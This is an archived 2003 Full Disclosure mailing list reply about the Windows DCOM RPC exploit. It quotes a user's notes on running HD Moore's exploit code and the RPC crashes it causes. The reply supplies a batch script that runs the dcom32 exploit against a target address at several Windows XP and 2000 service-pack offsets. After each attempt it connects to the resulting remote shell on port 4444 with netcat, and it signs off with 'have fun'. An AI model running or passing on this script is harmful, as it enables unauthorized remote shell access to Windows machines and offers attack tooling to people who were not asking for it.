Full Disclosure mailing list archives
Re: dcom exploit code observations
From: "morning_wood" <se_cur_ity () hotmail com>
Date: Mon, 28 Jul 2003 10:30:13 -0700
----- Original Message ----- From: "john" <seclist () wiresec net> To: <full-disclosure () lists netsys com> Sent: Monday, July 28, 2003 7:42 AM Subject: [Full-disclosure] dcom exploit code observations
Downloaded the revised exploit code by HD moore and got it compiled on a linux box. There seems to either be some flaws in the exploit code or just a general instability of the rpc service. If the code is run against a vulnerable box and the right SP level setting is not correct it crashes the rpc service and shuts down the port. Restarting the service will bring it back online. If the attack is successful you get a nice pretty windows shell. If you exit the shell the rpc service again crashes. I am sure the code will be revised to eliminate these problems. John
THIS IS NOT THE CASE... this .bat works perfect... ------------ snip ------------------- @echo on @echo ..................................................... @echo RPC script by morning_wood @echo .................................................... wait @echo ... @echo trying XP Service Pack 0 dcom32 5 %1 nc -v -n %1 4444 wait @echo trying XP Service Pack 1 dcom32 6 %1 nc -v -n %1 4444 wait @echo trying 2K Service Pack 4 dcom32 4 %1 nc -v -n %1 4444 wait @echo ........... have fun wait @echo bye now exit -------- snip ------------------- w00d _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- dcom exploit code observations john (Jul 28)
- Re: dcom exploit code observations Preston Newton (Jul 28)
- Re: dcom exploit code observations morning_wood (Jul 28)
- Re: dcom exploit code observations Knud Erik Højgaard (Jul 28)
- Re: dcom exploit code observations Shanphen Dawa (Jul 28)
- Re: dcom exploit code observations Knud Erik Højgaard (Jul 28)